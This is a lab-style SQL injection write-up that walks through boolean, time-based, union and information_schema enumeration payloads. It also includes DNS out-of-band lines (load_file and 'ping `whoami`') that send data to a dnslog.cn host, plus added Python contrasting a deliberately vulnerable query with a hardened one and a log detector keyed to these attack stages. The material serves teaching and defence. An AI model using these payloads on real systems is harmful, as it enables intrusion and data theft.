x010

Accumulate steadily, release sparingly

SQL Injection Write Up

Target Field

It is obvious on opening the page that there is an injection point.
Appending "and 1=1" to the parameter leaves the page displayed normally, while appending "and 1=2" makes the page abnormal.
From this it is judged that the parameter is probably a numeric type.
Numeric types need no quotation marks to close the value, whereas for character types the closing quotation mark has to be taken care of when constructing the payload.
An error on the "order by 3" page indicates that the current query has two columns; no echo point was found in the database at this stage.
and if(exists(select * from information_schema.tables limit 1),sleep(10),1)--
The if judgment together with the exists function is used to query whether the table "information_schema.tables" exists.
If it exists, the query delays for 10 seconds.
If it does not exist, the if expression returns the value 1, which is true in a boolean context and does not affect the result.
In short: if the table "information_schema.tables" exists, the page delays for 10 seconds; if it does not, the page executes normally with no delay.
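The numeric-type injection point and the "page normal / page abnormal" probes described above, as an added example that is not part of the original write-up: a vulnerable lookup that pastes the raw id into the statement sits beside its hardened form (integer validation plus a bound parameter). It assumes an in-memory sqlite3 table named "article" with two columns, which is constructed here; the table name, rows and function names are illustrative, not the target's.

```python
import sqlite3

# Constructed sample data: a two-column table standing in for the target's
# two-column query (the "order by 3" error on the page implies two columns).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)",
                     [(1, "first post"), (2, "second post")])
    return conn

def vulnerable_lookup(conn, raw_id):
    """Numeric-type injection point: the raw parameter is interpolated into the
    statement with no quotes, so there is no quote to close and 'and 1=2' is
    parsed as part of the WHERE clause."""
    sql = f"SELECT id, title FROM article WHERE id={raw_id}"
    return conn.execute(sql).fetchall()

def safe_lookup(conn, raw_id):
    """Hardened form: validate the numeric field and bind it as a parameter.
    Anything that is not an integer is rejected before it reaches the database."""
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, title FROM article WHERE id=?",
                        (article_id,)).fetchall()

def responds_ok(lookup, conn, raw_id):
    """Mirror the write-up's 'page normal / page abnormal' signal: a database
    error (for instance from 'order by 3') is what makes the page abnormal."""
    try:
        lookup(conn, raw_id)
        return True
    except sqlite3.Error:
        return False

def boolean_probe_distinguishable(lookup, conn):
    """True when 'and 1=1' and 'and 1=2' yield different results, i.e. the
    lookup leaks a boolean oracle the way the page's injection point does."""
    return lookup(conn, "1 and 1=1") != lookup(conn, "1 and 1=2")

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", vulnerable_lookup), ("hardened", safe_lookup)):
        print(name, "boolean oracle:", boolean_probe_distinguishable(fn, db),
              "| order by 2 ok:", responds_ok(fn, db, "1 order by 2"),
              "| order by 3 ok:", responds_ok(fn, db, "1 order by 3"))
```

Against the vulnerable function the two probes return different row sets and "order by 3" raises, reproducing the page's observations; against the hardened function both probes are rejected before any SQL runs, so there is no oracle and no column-count leak. Binding alone would also stop the injection, but rejecting non-integers first keeps a numeric field numeric end to end.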

On Linux, run ping `whoami`.i0f4xk.dnslog.cn: because whoami is wrapped in backticks, it is executed first and its output becomes part of the hostname that is looked up.
Likewise, ping $(whoami).i0f4xk.dnslog.cn has the same effect as the command above.
But if whoami is simply prepended to the DNS name without backticks, the command is not executed and its output does not appear.
Similarly, on Windows the command can be run as ping %username%..i0f4xk.dnslog.cn

I am still not very clear about the principle of DNS wildcard resolution. I hope someone can explain it in detail.

?id=1 union select 1,load_file(concat("\\",(select database()),".eoumbx.dnslog.cn\abc")) --+
The page is normal, but the DNS log never records a lookup.

Having found that the DNS log did not work, I then suddenly discovered that ?id=1 and 1=2 union select 1,2 actually does have an echo. I suddenly realized it (as a StarCraft player, it is hard to notice...)
So just use ?id=1 and 1=2 union select 1,database() directly to query the current database name, which is "maoshe".
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

information_schema is a special database defined by the SQL standard that stores database metadata: information about databases, tables, columns, constraints, permissions and so on.

In information_schema.tables, table_schema is the column holding the database a table belongs to and table_name is the column holding the table name.
In information_schema.columns, column_name is the column holding the column name.

Knowing the table name and column names, outputting the data is straightforward.

Searching online shows that the group_concat() function can be used to output many values in a single field.
For example, ?id=1 and 1=2 union select 5,group_concat(table_name) from information_schema.tables outputs every table_name value in one row.
?id=1 and 1=2 union select 5,group_concat(column_name) from information_schema.columns where table_name ='xss'

Next, a brief summary of the SQL injection approach:

  1. Find the injection point.
  2. Determine whether the parameter is a character type or a numeric type: character types need the appropriate quotation mark to close the value, numeric types do not.
  3. Use "order by" to determine the number of fields (this is needed later to find the echo points).
  4. Use a union query to find the echo point (if there is no echo, only blind injection is possible).
  5. Query the table names through "information_schema.tables" (one at a time with limit, or all at once with group_concat).
  6. Query the column names through "information_schema.columns".
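Every stage in the summary above, and in the union/information_schema enumeration walked through earlier, leaves a recognisable trace in the web server's access log. As an added example that is not part of the original write-up, the detector below URL-decodes each request target and flags the stage-specific signatures (boolean probe, "order by" column count, union select, information_schema lookups, sleep() timing, group_concat bulk extraction). The log lines, client addresses, paths and timestamps are constructed for the example; the combined-log format is assumed.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined-log style) replaying the kind of probe
# sequence the write-up walks through; hosts, paths and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1%20and%201=2 HTTP/1.1" 200 130
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20order%20by%203 HTTP/1.1" 500 88
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20and%201=2%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1%20and%20if(exists(select%20*%20from%20information_schema.tables%20limit%201),sleep(10),1)-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=2 HTTP/1.1" 200 520
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# Each signature corresponds to one stage described in the write-up.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enumeration": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "time_based": re.compile(r"\bsleep\s*\("),
    "bulk_extraction": re.compile(r"\bgroup_concat\s*\("),
}

def normalize(target):
    """URL-decode the request target, lower-case it and collapse whitespace so
    that %20 / + encodings and case changes do not hide a signature."""
    decoded = unquote_plus(target)
    return re.sub(r"\s+", " ", decoded).lower()

def scan_log(text):
    """Return one (client_ip, [signature names]) entry per request that matches
    at least one signature, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = normalize(m.group("target"))
        hits = sorted(name for name, pat in SIGNATURES.items() if pat.search(query))
        if hits:
            findings.append((m.group("ip"), hits))
    return findings

def probes_per_client(findings):
    """Count flagged requests per client; a single address walking through
    several stages in sequence is the pattern worth alerting on."""
    counts = {}
    for ip, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for ip, hits in results:
        print(ip, ", ".join(hits))
    print(probes_per_client(results))
```

The normalization only handles percent/plus encoding, case and whitespace; inline comments or other obfuscation would need further canonicalisation, and the signatures are deliberately narrow so that a legitimate "order by" in an application's own query string is not mistaken for a probe unless it appears inside a user-supplied parameter.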